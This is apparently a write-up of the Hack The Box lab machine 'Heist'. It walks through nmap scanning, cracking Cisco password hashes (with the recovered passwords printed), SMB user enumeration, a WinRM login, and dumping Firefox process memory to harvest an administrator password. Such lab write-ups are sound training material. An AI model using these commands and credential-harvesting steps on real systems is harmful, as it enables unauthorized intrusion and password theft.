Heist (Easy)

Enumeration

Nmap

nmap -sC -sV -oA nmap/10.10.10.149 10.10.10.149

Nmap scan report for 10.10.10.149
Host is up (0.11s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-09T16:24:17
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul  9 12:24:52 2021 -- 1 IP address (1 host up) scanned in 72.60 seconds

# Nmap 7.91 scan initiated Fri Jul  9 12:47:56 2021 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/_full_tcp_nmap.txt -oX /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/xml/_full_tcp_nmap.xml 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up, received user-set (0.090s latency).
Scanned at 2021-07-09 12:47:57 EDT for 350s
Not shown: 65530 filtered ports
Reason: 65530 no-responses
PORT      STATE SERVICE       REASON  VERSION
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds? syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 20087/tcp): CLEAN (Timeout)
|   Check 2 (port 48515/tcp): CLEAN (Timeout)
|   Check 3 (port 25486/udp): CLEAN (Timeout)
|   Check 4 (port 40753/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-09T16:53:10
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul  9 12:53:47 2021 -- 1 IP address (1 host up) scanned in 350.69 seconds

As usual, I will check port 80 and port 445

Port 80

We can see a page like this and we are able to login as guest.

When we click the attachment shown at user Hazard, we can see this

Upon researching, we know that type 7 password is crack-able.

We can use this website to crack it.

Meanwhile, for the type 5 password, we can use John-The-Ripper to crack it.

Hash	Password
02375012182C1A1D751618034F36415408	Q4)sJu\Y8qz*A3?d
0242114B0E143F015F5D1E161713	$uperP@ssword
$1$pdQG$o8nrSzsGXeaduXrjlvKc91	stealth1agent

After tons of trying, finally can login to SMB using the correct pair of credentials.

smbclient --list //10.10.10.149/IPC$ -U hazard%stealth1agent

Then, I proceed to use impacket-lookupsid to find other possible users.

impacket-lookupsid hazard:stealth1agent@10.10.10.149

We can see there are user Chase and Jason.

From the nmap full tcp scan, we know that port 5985 is for win-rm that can let us to login to the system.

User

We can use user Chase and the password Q4)sJu\Y8qz*A3?d

evil-winrm -i 10.10.10.149 -u Chase -p "Q4)sJu\Y8qz*A3?d"

Got user flag !

Privilege Escalation

after some enumeration, we can see that Mozilla Firefox is installed in the machine.

From the ps command, we can see that there are few Firefox processes running.

We can use ProcDump64 to dump all the information inside the processes, then use strings to extract the information.

./procdump64.exe -accepteula -ma 6728

We can see there is a dump being created

Now we can use strings.exe to pipe the readable input to a file.

./strings.exe -accepteula firefox.exe_210802_163838.dmp > readable.txt

After that, we can download the file that we have readable strings.

When I use sublime to search for the password, it shows this

Then, we can proceed to login as administrator using the password shown.

Congratz !